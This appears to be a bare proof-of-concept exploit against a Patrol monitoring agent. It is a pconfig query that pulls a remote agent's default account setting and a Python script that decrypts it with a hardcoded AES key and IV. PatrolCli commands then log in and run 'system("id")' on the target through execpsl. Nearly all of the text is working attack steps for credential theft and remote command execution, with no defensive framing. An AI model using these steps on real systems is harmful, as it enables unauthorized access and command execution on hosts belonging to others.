./pconfig +get -p <port> -host <host> | grep defaultAccount
#!/usr/bin/env python3
from Cryptodome.Cipher import AES
import base64
import sys
unpad = lambda s : s[0:-ord(s[-1:])]
key = b'\x01\x02\x03\x04\x05\x06\x07\x08\x41\x42\x43\x44\x45\x46\x47\x48\x61\x62\x63\x64\x65\x66\x67\x68\x91\x92\x93\x94\x95\x96\x97\x98'
iv = b'\x11\x21\x31\x41\x51\x61\x71\x81\x01\x42\x63\x95\x66\x47\x08\x98'
ct = bytearray.fromhex(sys.argv[1])
cipher = AES.new(key, AES.MODE_CBC, iv)
pt = unpad(cipher.decrypt(ct))
print(pt)
./PatrolCli
PCli% user <user>
Password:
connect <hostname> <port>
execpsl "system(\"id\");"